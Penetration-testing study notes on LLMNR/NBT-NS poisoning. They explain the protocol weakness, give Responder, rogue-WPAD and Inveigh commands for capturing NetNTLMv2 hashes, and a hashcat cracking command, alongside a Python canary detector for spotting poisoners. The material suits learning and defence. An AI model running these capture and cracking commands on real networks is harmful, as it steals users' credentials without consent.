LLMNR Poisoning
A Man-in-the-Middle attack on Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) broadcasts
This attack may yield low-privileged or administrative-level password hashes that can be cracked offline, or even cleartext credentials.
LLMNR and NBT-NS are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails.
LLMNR is a protocol that allows both IPv4 and IPv6 hosts
If a machine attempts to resolve a host but DNS resolution fails, it will typically ask all other machines on the local network for the correct host address via LLMNR. LLMNR is based on the Domain Name System (DNS) message format and allows hosts on the same local link to perform name resolution for other hosts. It uses port 5355 over UDP natively.
If LLMNR fails, NBT-NS will be used. NBT-NS identifies systems on a local network by their NetBIOS name. NBT-NS uses port 137 over UDP.
You don't need to be local admin.
Issue
When LLMNR/NBT-NS are used for name resolution, ANY host on the network can reply.
So we can become an authoritative name resolution source in the broadcast domain by replying to LLMNR and NBT-NS as if we knew the answer.
The victim will share its NetNTLM hash if the requested host requires authentication.
We can then take the hash and try to crack it offline, use it in an SMB relay attack, or relay it to a different protocol such as LDAP on the same host.
LLMNR/NBNS spoofing combined with a lack of SMB signing can often lead to administrative access on hosts within a domain.
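As an added defensive example (not part of the original notes, and not Responder or Inveigh code), the block below parses LLMNR messages in their DNS-style wire format and applies the canary check defenders use to spot a poisoner: query a hostname that does not exist on the network and treat any reply as spoofed. The hostname, addresses and packet bytes are constructed for the demo.

```python
import socket
import struct

# LLMNR (RFC 4795) reuses the DNS wire format, carried over UDP 5355 to 224.0.0.252.

def build_query(name, tid=0x1234):
    """Encode the query a Windows host multicasts after DNS fails to resolve `name`."""
    labels = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    header = struct.pack("!6H", tid, 0x0000, 1, 0, 0, 0)  # flags 0: standard query
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN

def _read_name(buf, off):
    """Decode a DNS-style label sequence at `off`; returns (name, next offset)."""
    labels = []
    while buf[off]:
        ln = buf[off]
        labels.append(buf[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln
    return ".".join(labels), off + 1

def parse_llmnr(buf):
    """Parse an LLMNR message into header flags, questions and answers."""
    tid, flags, qd, an, _ns, _ar = struct.unpack("!6H", buf[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = _read_name(buf, off)
        qtype, _qclass = struct.unpack("!HH", buf[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = _read_name(buf, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata, off = buf[off:off + rdlen], off + rdlen
        addr = socket.inet_ntoa(rdata) if rtype == 1 and rdlen == 4 else rdata.hex()
        answers.append((name, ttl, addr))
    return {"id": tid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}

def check_canary(canary, src_ip, buf):
    """A reply for a name that does not exist on the network can only come from a spoofer."""
    msg = parse_llmnr(buf)
    hits = [addr for name, _, addr in msg["answers"] if name.lower() == canary.lower()]
    if msg["is_response"] and hits:
        return f"LLMNR poisoning suspected: {src_ip} resolved {canary} to {hits[0]}"
    return None

# Constructed sample: a reply to a query for a host that does not exist, as a poisoner sends.
SAMPLE_RESPONSE = (b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00"
                   b"\x09filesrv01\x00\x00\x01\x00\x01"
                   b"\x09filesrv01\x00\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\x0a\x00\x00\x42")
```

In a live deployment the canary name is sent with `build_query` to the multicast group on a schedule and every datagram received on port 5355 is passed to `check_canary` with its source address; a legitimate network never answers for that name.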
For Linux, we will use Responder, and for Windows we will use Inveigh.
Attack from Linux
# /usr/share/responder/logs is the log directory where Responder stores captured hashes etc.
sudo responder -I <interface>
# When a device is set to "Auto-detect" proxy settings, it will try to find a
# WPAD server on the network. The -w flag in Responder starts a rogue WPAD server.
# WPAD is a protocol that allows clients to automatically discover and configure proxy
# settings. When a device (e.g., a Windows machine) tries to detect a proxy server, it
# will send a WPAD request on the network. If Responder is running with the -w flag, it will
# respond to this request with a malicious wpad.dat file. This file contains instructions
# telling the client to use the attacker's proxy (the one running Responder) for all web traffic.
sudo responder -I <interface> -w
Note:
- NetNTLMv2 hashes are very useful once cracked, but cannot be used for techniques such as pass-the-hash.
- Pass-the-hash attack works on NTLMv1 protocol.
- NTLMv2 includes a challenge-response mechanism where the client and the server both use a nonce (random number) generated by the server as part of the authentication process.
- The NTLMv2 response is calculated using not only the password hash but also this nonce, making the hash effectively "tied" to a specific challenge.
- As a result, an NTLMv2 hash is not directly reusable across different authentication attempts like an NTLMv1 hash, because the challenge is unique each time.
Cracking NTLMv2 hashes using Hashcat:
hashcat -m 5600 ntlmv2_hash /usr/share/wordlists/rockyou.txt
Attack from Windows
Import-Module .\Inveigh.ps1
# start capturing (LLMNR and NBNS spoofing, output to console and file)
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
# view unique captured hashes
Invoke-Inveigh GET NTLMV2UNIQUE
# see which usernames we have collected
Invoke-Inveigh GET NTLMV2USERNAMES